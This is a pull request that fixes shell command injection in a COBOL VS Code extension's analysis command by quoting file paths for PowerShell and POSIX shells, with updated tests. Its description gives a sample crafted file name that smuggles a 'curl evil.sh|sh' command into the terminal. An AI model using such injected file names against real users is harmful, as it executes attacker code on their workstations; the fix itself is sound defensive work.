### PR TITLE
fix: fix shell command injection

### DIFF
--- a/clients/cobol-lsp-vscode-extension/src/__mocks__/vscode.ts
+++ b/clients/cobol-lsp-vscode-extension/src/__mocks__/vscode.ts
@@ -418,3 +418,8 @@ export enum FileChangeType {
   Created = 2,
   Deleted = 3,
 }
+
+// eslint-disable-next-line @typescript-eslint/no-namespace
+export namespace env {
+  export const shell: string = "";
+}

--- a/clients/cobol-lsp-vscode-extension/src/__tests__/commands/RunAnalysisCLITest.spec.ts
+++ b/clients/cobol-lsp-vscode-extension/src/__tests__/commands/RunAnalysisCLITest.spec.ts
@@ -61,14 +61,14 @@ describe("Test Analysis CLI command functionality", () => {
 
     expect(runCobolAnalysisCommandSpy).toHaveBeenCalled();
     expect(getCurrentFileLocationSpy).toHaveBeenCalled();
-    expect(buildJavaCommandSpy).toHaveBeenCalledWith("/storagePath");
+    expect(buildJavaCommandSpy).toHaveBeenCalledWith("'/storagePath'");
     expect(buildJavaCommandSpy).toHaveReturnedWith(
       process.platform === "win32"
         ? 'java -jar "\\test\\server\\jar\\server.jar" analysis -s "/storagePath" -cf=.'
-        : 'java -jar "/test/server/jar/server.jar" analysis -s "/storagePath" -cf=.',
+        : "java -jar \"/test/server/jar/server.jar\" analysis -s '/storagePath' -cf=.",
     );
     expect(buildAnalysisCommandPortionSpy).toHaveReturnedWith(
-      'analysis -s "/storagePath" -cf=.',
+      "analysis -s '/storagePath' -cf=.",
     );
     expect(sendToTerminalSpy).toHaveBeenCalled();
 
@@ -115,11 +115,11 @@ describe("Test Analysis CLI command functionality", () => {
     expect(runCobolAnalysisCommandSpy).toHaveBeenCalled();
     expect(getCurrentFileLocationSpy).toHaveBeenCalled();
     expect(buildNativeCommandSpy).toHaveBeenCalledWith(
-      "/storagePath",
+      "'/storagePath'",
       process.platform,
     );
     expect(buildAnalysisCommandPortionSpy).toHaveReturnedWith(
-      'analysis -s "/storagePath" -cf=.',
+      "analysis -s '/storagePath' -cf=.",
     );
     expect(sendToTerminalSpy).toHaveBeenCalled();
 

--- a/clients/cobol-lsp-vscode-extension/src/__tests__/commands/RunAnalysisCLITest.spec.ts
+++ b/clients/cobol-lsp-vscode-extension/src/__tests__/commands/RunAnalysisCLITest.spec.ts
@@ -64,7 +64,7 @@ describe("Test Analysis CLI command functionality", () => {
     expect(buildJavaCommandSpy).toHaveBeenCalledWith("'/storagePath'");
     expect(buildJavaCommandSpy).toHaveReturnedWith(
       process.platform === "win32"
-        ? 'java -jar "\\test\\server\\jar\\server.jar" analysis -s "/storagePath" -cf=.'
+        ? "java -jar \"\\test\\server\\jar\\server.jar\" analysis -s '/storagePath' -cf=."
         : "java -jar \"/test/server/jar/server.jar\" analysis -s '/storagePath' -cf=.",
     );
     expect(buildAnalysisCommandPortionSpy).toHaveReturnedWith(

--- a/clients/cobol-lsp-vscode-extension/src/commands/RunAnalysisCLI.ts
+++ b/clients/cobol-lsp-vscode-extension/src/commands/RunAnalysisCLI.ts
@@ -261,13 +261,15 @@ export class RunAnalysis {
    */
   private getQuotedPath(fsPath: string): string {
     if (this.checkIfPowerShell()) {
-      // PowerShell: Reject paths containing any quote characters
-      if (fsPath.includes("'") || fsPath.includes('"')) {
+      // Double quotes are dangerous because they allow variable expansion in PowerShell.
+      if (fsPath.includes('"')) {
         throw new Error(
           "Paths containing quote characters cannot be safely executed in PowerShell.",
         );
       }
-      return fsPath;
+      // Escape single quotes by doubling them up (' -> '')
+      const escapedPath = fsPath.replace(/'/g, "''");
+      return `'${escapedPath}'`;
     } else {
       // POSIX: Escape embedded single quotes by closing the string,
       // adding an escaped single quote, and reopening the string.

--- a/clients/cobol-lsp-vscode-extension/src/commands/RunAnalysisCLI.ts
+++ b/clients/cobol-lsp-vscode-extension/src/commands/RunAnalysisCLI.ts
@@ -14,6 +14,7 @@
 
 import * as vscode from "vscode";
 import { Terminal } from "vscode";
+import { SettingsService } from "../services/Settings";
 
 export interface AnalysisConfiguration {
   typeToRun?: string;
@@ -158,7 +159,7 @@ export class RunAnalysis {
 
     if (extensionFolder && currentFileLocation !== "") {
       return (
-        'java -jar "' +
+        `${SettingsService.getJavaCommand()} -jar "` +
         extensionFolder +
         '" ' +
         this.buildAnalysisCommandPortion(currentFileLocation)
@@ -183,9 +184,9 @@ export class RunAnalysis {
     }`;
 
     return (
-      'analysis -s "' +
+      "analysis -s " +
       currentFileLocation +
-      '" ' +
+      " " +
       copyBookCommand +
       (this.showDiagnostics ? "" : " -nd")
     );
@@ -205,8 +206,33 @@ export class RunAnalysis {
       ? existingTerminal
       : vscode.window.createTerminal("Analysis");
 
+    if (this.checkIfPowerShell()) {
+      command = `& '${command}'`;
+    }
     terminal.sendText(command);
     terminal.show(true);
+  }
+
+  private checkIfPowerShell() {
+    const isWindows = process.platform === "win32";
+    const isMac = process.platform === "darwin";
+    const osKey = isWindows ? "windows" : isMac ? "osx" : "linux";
+
+    const config = vscode.workspace.getConfiguration("terminal.integrated");
+    const defaultProfile = config.get<string>(`defaultProfile.${osKey}`);
+
+    if (defaultProfile) {
+      const profileLower = defaultProfile.toLowerCase();
+      if (
+        profileLower.includes("powershell") ||
+        profileLower.includes("pwsh")
+      ) {
+        return true;
+      }
+      return false;
+    }
+    const shellPath = vscode.env.shell?.toLowerCase() || "";
+    return shellPath.includes("powershell") || shellPath.includes("pwsh");
   }
 
   /**
@@ -220,10 +246,35 @@ export class RunAnalysis {
       if (vscode.window.activeTextEditor.document.uri.scheme !== "file") {
         return this.saveTempFile();
       } else {
-        return vscode.window.activeTextEditor.document.uri.fsPath;
+        return this.getQuotedPath(
+          vscode.window.activeTextEditor.document.uri.fsPath,
+        );
       }
     }
     return "";
+  }
+
+  /**
+   * Safely quotes a file path for terminal execution.
+   * @param fsPath The raw file path from the VS Code URI
+   * @returns The safely quoted path string
+   */
+  private getQuotedPath(fsPath: string): string {
+    if (this.checkIfPowerShell()) {
+      // PowerShell: Reject paths containing any quote characters
+      if (fsPath.includes("'") || fsPath.includes('"')) {
+        throw new Error(
+          "Paths containing quote characters cannot be safely executed in PowerShell.",
+        );
+      }
+      return fsPath;
+    } else {
+      // POSIX: Escape embedded single quotes by closing the string,
+      // adding an escaped single quote, and reopening the string.
+      const escapedPath = fsPath.replace(/'/g, "'\\''");
+      // Wrap the entire path in single quotes
+      return `'${escapedPath}'`;
+    }
   }
 
   /**


### PR DESCRIPTION
## How Has This Been Tested?

Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration

- [ ] Test a COBOL file with a crafted name (e.g. pgm&quot;;curl evil.sh|sh;#.cbl)
gains arbitrary command execution on the developer workstation when the victim opens that file and
runs the analysis command. 

** NOTE: Windows testing pending

> Weird Case as the developer already has access to the workstation. Valid if the file is coming from a remote where its named  in such a way that it would try to execute some code

## Checklist:
- [ ] Each of my commits contains one meaningful change
- [ ] I have performed rebase of my branch on top of the development
- [ ] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] My changes generate no new warnings
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] New and existing unit tests pass locally with my changes
- [ ] I have checked my code and corrected any misspellings
